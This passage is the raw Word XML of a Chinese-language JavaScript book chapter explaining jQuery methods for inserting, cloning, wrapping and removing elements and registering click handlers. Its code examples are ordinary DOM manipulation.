        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>第二列中的方法返回调用自身的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:t>该</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的元素有可能有新内容或新兄弟节点，但这些元素自身并没有修改。第三列中的方法在插入的内容上调用，返回一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象，表示插入操作后的新内容。特别注意，当内容被插入多个地方时，返回的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象将为每一个地方保留一个元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上面列举了不同点，下面的代码将实现与上面的代码一样的操作，使用的是第三列中的方法来替代第二列中的。注意在第二行的</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>代码中不能传入纯文本（不带任何＜＞括号来标识它为</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>）给</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>它会被当做选择器。因此，必须显式创建需要插入的文本节点：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>+message").appendTo("#log");//</w:t>
      </w:r>
      <w:r>
        <w:t>添加</w:t>
      </w:r>
      <w:r>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:t>#log</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$(document.createTextNode("§")).prependTo("h1");//</w:t>
      </w:r>
      <w:r>
        <w:t>给所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞添加文本节点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>hr/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>").insertBefore("h1");//</w:t>
      </w:r>
      <w:r>
        <w:t>在所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞前面插入水平线</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>hr/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>").insertAfter("h1");//</w:t>
      </w:r>
      <w:r>
        <w:t>在所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞后面插入水平线</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>").replaceAll("hr");//</w:t>
      </w:r>
      <w:r>
        <w:t>将＜</w:t>
      </w:r>
      <w:r>
        <w:t>hr/</w:t>
      </w:r>
      <w:r>
        <w:t>＞替换为＜</w:t>
      </w:r>
      <w:r>
        <w:t>br/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="475" w:name="19_3_2_Fu_Zhi_Yuan_Su_"/>
      <w:r>
        <w:t>19.3.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　复制元素</w:t>
      </w:r>
      <w:bookmarkEnd w:id="475"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如上所述，如果插入的元素已经是文档的一部分，这些元素只会简单地移动而不是复制到新位置。如果元素到插入不止一个位置，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>在需要时会复制元素，但是当只插入一个位置时，是不会进行复制操作的。如果想复制元素到新位置而不是移动它，必须首先用</w:t>
      </w:r>
      <w:r>
        <w:t>clone()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来得到一个副本。</w:t>
      </w:r>
      <w:r>
        <w:t>clone()</w:t>
      </w:r>
      <w:r>
        <w:t>创建并返回每一个选中元素（包含元素所有子孙）的一个副本。返回的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象的元素还不是文档的一部分，可以用上一节中的方法将其插入文档中：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>给文档结尾添加一个带有</w:t>
      </w:r>
      <w:r>
        <w:t>"linklist"id</w:t>
      </w:r>
      <w:r>
        <w:t>的新</w:t>
      </w:r>
      <w:r>
        <w:t>di</w:t>
      </w:r>
      <w:r>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$(document.body).append("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div id='linklist'</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>List of Links</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>");//</w:t>
      </w:r>
      <w:r>
        <w:t>将文档中的所有链接复制并插入该新</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>$("a").clone().appendTo("#linklist");//</w:t>
      </w:r>
      <w:r>
        <w:t>在每一个链接后面插入＜</w:t>
      </w:r>
      <w:r>
        <w:t>br/</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，使其以独立行显示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("#linklist</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>a").after("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>clone()</w:t>
      </w:r>
      <w:r>
        <w:t>不会复制事件处理程序（见</w:t>
      </w:r>
      <w:r>
        <w:t>19.4</w:t>
      </w:r>
      <w:r>
        <w:t>节）和与元素关联的其他数据（见</w:t>
      </w:r>
      <w:r>
        <w:t>19.2.7</w:t>
      </w:r>
      <w:r>
        <w:t>节）。如果想复制这些额外</w:t>
      </w:r>
      <w:r>
        <w:t>的数据，请传入</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="476" w:name="19_3_3_Bao_Zhuang_Yuan_Su_"/>
      <w:r>
        <w:t>19.3.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　包装元素</w:t>
      </w:r>
      <w:bookmarkEnd w:id="476"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>插入</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档的另一种类型涉及在一个或多个元素中包装新元素。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>定义了</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个包装函数。</w:t>
      </w:r>
      <w:r>
        <w:t>wrap()</w:t>
      </w:r>
      <w:r>
        <w:t>包装每一个选中元素。</w:t>
      </w:r>
      <w:r>
        <w:t>wrapInner()</w:t>
      </w:r>
      <w:r>
        <w:t>包装每一个选中元素的内容。</w:t>
      </w:r>
      <w:r>
        <w:t>wrapAll()</w:t>
      </w:r>
      <w:r>
        <w:t>则将选中元素作为一组来包装。这些方法通常传入一个新创建的包装元素或用来创新包装元素的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>字符串。如果需要，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>字符串可以包含多个嵌套元素，但必须是单个最内层的元素。如果传入函数给这些方法，它会在每个元素的上下文中调用一次，</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>指向该元素，元素的索引值是唯</w:t>
      </w:r>
      <w:r>
        <w:t>一参数，应该返回需要返回表示包装元素的字符串、</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象。下面是些例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>用＜</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素包装所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("h1").wrap(document.createElement("i"));//</w:t>
      </w:r>
      <w:r>
        <w:t>产生＜</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/i</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>包装所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的内容，使用字符串参数更简单</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("h1").wrapInner("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>i/</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>");//</w:t>
      </w:r>
      <w:r>
        <w:t>产生＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/i</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将第一个段落包装在一个锚点和</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>里</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("body</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>p:first").wrap("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>a name='lead'</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>div class='first'</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/a</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>");//</w:t>
      </w:r>
      <w:r>
        <w:t>将所有其他段落包装在另一个</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>里</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("body</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>p:not(:first)").wrapAll("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div class='rest'</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="477" w:name="19_3_4_Shan_Chu_Yuan_Su_"/>
      <w:r>
        <w:t>19.3.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　删除元素</w:t>
      </w:r>
      <w:bookmarkEnd w:id="477"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了插入和替换操作，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>还定义了用来删除元素的方法。</w:t>
      </w:r>
      <w:r>
        <w:t>empty()</w:t>
      </w:r>
      <w:r>
        <w:t>会删除每个选中元素的所有子节点（包括文本节点），但不会修改元素自身。对比而言，</w:t>
      </w:r>
      <w:r>
        <w:t>remove()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会从文档中移除选中元素（以及所有元素的内容）。通常不带参数调</w:t>
      </w:r>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>remove()</w:t>
      </w:r>
      <w:r>
        <w:t>，此时会从文档中移除</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的所有元素。然而，如果传入一个参数，该参数会被当成选择器，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中只有匹配该选择器的元素才会被移除。（如果只想将元素从选中元素集中移除，而不需要从文档中移除时，请使用</w:t>
      </w:r>
      <w:r>
        <w:t>filter()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，该方法会在</w:t>
      </w:r>
      <w:r>
        <w:t>19.8.2</w:t>
      </w:r>
      <w:r>
        <w:t>节讲述。）注意，将元素重新插入文档前，移除操作是没有必要的：简单地将其插入新位置，就会移动它们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>remove()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会移除所有事件处理程序（参考</w:t>
      </w:r>
      <w:r>
        <w:t>19.4</w:t>
      </w:r>
      <w:r>
        <w:t>节）以及可能绑定到被移除元素上的其他数据（参见</w:t>
      </w:r>
      <w:r>
        <w:t>19.2.7</w:t>
      </w:r>
      <w:r>
        <w:t>节）。</w:t>
      </w:r>
      <w:r>
        <w:t>detach()</w:t>
      </w:r>
      <w:r>
        <w:t>方</w:t>
      </w:r>
      <w:r>
        <w:t>法和</w:t>
      </w:r>
      <w:r>
        <w:t>remove()</w:t>
      </w:r>
      <w:r>
        <w:t>类似，但不会移除事件处理程序和数据。想临时从文档中移除元素以便后续再次插入时，</w:t>
      </w:r>
      <w:r>
        <w:t>detach()</w:t>
      </w:r>
      <w:r>
        <w:t>可能会更有用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>最后，</w:t>
      </w:r>
      <w:r>
        <w:t>unwrap()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以用来实现元素的移除，其方式是</w:t>
      </w:r>
      <w:r>
        <w:t>wrap()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>wrapAll()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的反操作：移除每一个选中元素的父元素，不影响选中元素及其兄弟节点。也就是说，对于每一个选中元素，它替换该元素的父节点为父节点的子节点。与</w:t>
      </w:r>
      <w:r>
        <w:t>remove()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>detach()</w:t>
      </w:r>
      <w:r>
        <w:t>不同，</w:t>
      </w:r>
      <w:r>
        <w:t>unwrap()</w:t>
      </w:r>
      <w:r>
        <w:t>不接受可选的选择器参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="478" w:name="19_4_Shi_Yong_jQueryChu_Li_Shi_Jian_"/>
      <w:r>
        <w:t>19.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　使用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>处理事件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="478"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在第</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>章我们知道，处理事件时有一个难点是</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>IE9</w:t>
      </w:r>
      <w:r>
        <w:t>以下）实现了一个与所有其他浏览器不同的事件</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。为了解决这一难点，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一个统一事件</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，可工作在所有浏览器中。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery API</w:t>
      </w:r>
      <w:r>
        <w:t>具有简单的形式，比标准或</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的事件</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>更容易使用。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery API</w:t>
      </w:r>
      <w:r>
        <w:t>还具有更复杂、功能更齐全的形式，比标准</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>更强大。接下来的章节会详细阐述。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="479" w:name="19_4_1_Shi_Jian_Chu_Li_Cheng_Xu_De_Jian_"/>
      <w:r>
        <w:t>19.4.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　事件处理程序的简单注册</w:t>
      </w:r>
      <w:bookmarkEnd w:id="479"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>定义了简单的事件注册方法，可用于常用和普适的每一个浏览器事件。比如，给单击事件注册一个事件处理程序，只要调用</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>lick()</w:t>
      </w:r>
      <w:r>
        <w:t>方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>单击任意＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞时，使其背景变成灰色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>$("p").click(function(){$(this).css("background-color","gray");});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的事件注册方法可以给所有选中元素注册处理程序。很明显，这比使用</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>一次注册一个事件处理程序简单很多。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>定义的简单事件处理程序注册的方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251704320" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3196086" cy="785003"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="45" name="00045.jpeg" descr="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00045.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
